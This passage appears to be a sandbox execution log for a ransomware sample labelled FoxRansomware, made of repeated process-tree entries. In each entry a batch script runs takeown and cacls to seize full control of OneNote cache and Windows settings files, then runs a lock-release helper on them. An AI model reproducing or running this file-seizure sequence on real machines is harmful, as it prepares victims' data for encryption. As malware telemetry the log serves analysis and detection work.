C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000072.bin" -nobanner4⤵PID:5736
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin""2⤵PID:7752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin" /E /G Admin:F /C3⤵PID:7056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007C.bin"3⤵PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007C.bin" -nobanner3⤵PID:6820
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007C.bin" -nobanner4⤵PID:6444
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin""2⤵PID:7356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin" /E /G Admin:F /C3⤵PID:4896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007M.bin"3⤵
- Modifies file permissions
PID:6600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007M.bin" -nobanner3⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007M.bin" -nobanner4⤵PID:6724
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin""2⤵PID:7844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin" /E /G Admin:F /C3⤵PID:4120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008L.bin"3⤵PID:6564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000008L.bin" -nobanner3⤵PID:6072
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000008L.bin" -nobanner4⤵PID:5048
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin""2⤵PID:1432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin" /E /G Admin:F /C3⤵PID:5180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000091.bin"3⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000091.bin" -nobanner3⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000091.bin" -nobanner4⤵PID:2220
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""2⤵PID:5348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C3⤵PID:6752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"3⤵
- Modifies file permissions
PID:6304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006L.bin" -nobanner3⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006L.bin" -nobanner4⤵PID:6344
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin""2⤵PID:6648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin" /E /G Admin:F /C3⤵PID:5300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009M.bin"3⤵PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009M.bin" -nobanner3⤵PID:6320
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009M.bin" -nobanner4⤵PID:7372
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin""2⤵PID:5512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin" /E /G Admin:F /C3⤵PID:3204
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A7.bin"3⤵PID:6576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A7.bin" -nobanner3⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A7.bin" -nobanner4⤵PID:6452
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""2⤵PID:6776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C3⤵PID:7736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"3⤵PID:7076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007T.bin" -nobanner3⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007T.bin" -nobanner4⤵PID:8124
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""2⤵PID:8136
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C3⤵PID:7028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin"3⤵PID:3692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000087.bin" -nobanner3⤵PID:5428
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000087.bin" -nobanner4⤵PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1""2⤵PID:6884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C3⤵PID:6812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"3⤵
- Modifies file permissions
PID:8152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "settings.dat.LOG1" -nobanner3⤵PID:7024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "settings.dat.LOG1" -nobanner4⤵PID:4288
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:6464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C3⤵PID:7196
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"3⤵
- Modifies file permissions
PID:1388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "TileCache_100_0_Data.bin" -nobanner3⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "TileCache_100_0_Data.bin" -nobanner4⤵PID:7588
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2""2⤵PID:6944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C3⤵PID:5624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2"3⤵PID:5276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "settings.dat.LOG2" -nobanner3⤵PID:6896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "settings.dat.LOG2" -nobanner4⤵PID:5604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""2⤵PID:6296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C3⤵PID:7644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"3⤵
- Modifies file permissions
PID:7188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000099.bin" -nobanner3⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000099.bin" -nobanner4⤵PID:8040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""2⤵PID:5632
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C3⤵PID:7496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"3⤵PID:7772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009J.bin" -nobanner3⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009J.bin" -nobanner4⤵PID:8100
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""2⤵PID:2292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C3⤵PID:7624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"3⤵
- Modifies file permissions
PID:7988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A4.bin" -nobanner3⤵PID:7388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A4.bin" -nobanner4⤵PID:4188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""2⤵PID:7104
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C3⤵PID:7460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"3⤵PID:7396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AF.bin" -nobanner3⤵PID:8012
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AF.bin" -nobanner4⤵PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""2⤵PID:5816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C3⤵PID:6484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"3⤵PID:388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AP.bin" -nobanner3⤵PID:7452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AP.bin" -nobanner4⤵PID:7896
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""2⤵PID:3020
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C3⤵PID:7456
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin"3⤵
- Modifies file permissions
PID:7532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B5.bin" -nobanner3⤵PID:5536
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000B5.bin" -nobanner4⤵PID:6028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5964
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1""2⤵PID:5952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C3⤵PID:5924
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1"3⤵PID:5824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "settings.dat.LOG1" -nobanner3⤵PID:3040
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "settings.dat.LOG1" -nobanner4⤵PID:2068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""2⤵PID:5988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C3⤵PID:6840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"3⤵
- Modifies file permissions
PID:1660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000008.bin" -nobanner3⤵PID:6152
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000008.bin" -nobanner4⤵PID:5772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""2⤵PID:5144
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C3⤵PID:5584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"3⤵PID:4748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000M.bin" -nobanner3⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000M.bin" -nobanner4⤵PID:2996
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""2⤵PID:4524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C3⤵PID:4656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"3⤵PID:4548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000010.bin" -nobanner3⤵PID:7880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000010.bin" -nobanner4⤵PID:8072
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4480
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""2⤵PID:7660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C3⤵PID:5976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"3⤵PID:7820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000054.bin" -nobanner3⤵PID:5580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000054.bin" -nobanner4⤵PID:2800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin""2⤵PID:4884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C3⤵PID:8076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"3⤵PID:2296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000004.bin" -nobanner3⤵PID:7004
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000004.bin" -nobanner4⤵PID:5056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""2⤵PID:5304
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C3⤵PID:5880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"3⤵PID:5336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000H.bin" -nobanner3⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000H.bin" -nobanner4⤵PID:1584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""2⤵PID:1800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C3⤵PID:7760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"3⤵PID:1876
-
-
